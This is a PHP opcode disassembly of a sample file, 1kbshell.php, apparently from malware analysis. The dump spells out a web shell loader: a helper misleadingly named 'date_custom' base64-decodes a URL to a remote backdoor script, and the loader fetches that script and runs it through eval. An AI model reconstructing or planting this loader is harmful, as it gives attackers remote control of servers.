|filename:|/root/samples/1kbshell.php
|functionname:|(null)
|numberofops:|12
|compiledvars:|!0=$krl,|!1=$dt,|!2=$ia
|line|#*|||op|fetch|ext|return|operands
|1|0|E>|ASSIGN||||!0|,|'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2FsYXJjaWRrL1dlYnNoZWxsYmFja2Rvb3IvbWFpbi9taW5pc2hlbGwucGhw'|
||1||INIT_FCALL||||'date_custom'|
||2||SEND_VAR||||!0|
||3||DO_FCALL||0|$4|
||4||ASSIGN||||!1|,|$4|
||5||INIT_FCALL||||'file_get_contents'|
||6||SEND_VAR||||!1|
||7||DO_ICALL|||$6|
||8||ASSIGN||||!2|,|$6|
||9||CONCAT|||~8|'%3F%3E'|,|!2|
||10||INCLUDE_OR_EVAL||||~8|,|EVAL|
|2|11|>|RETURN||||1|
|
|Functiondate_custom:
|filename:|/root/samples/1kbshell.php
|functionname:|date_custom
|numberofops:|6
|compiledvars:|!0=$data
|line|#*|||op|fetch|ext|return|operands
|1|0|E>|RECV|||!0|
||1||INIT_FCALL||||'base64_decode'|
||2||SEND_VAR||||!0|
||3||DO_ICALL|||$1|
||4|>|RETURN||||$1|
||5|*>|RETURN||||null|
|
|Endoffunctiondate_custom

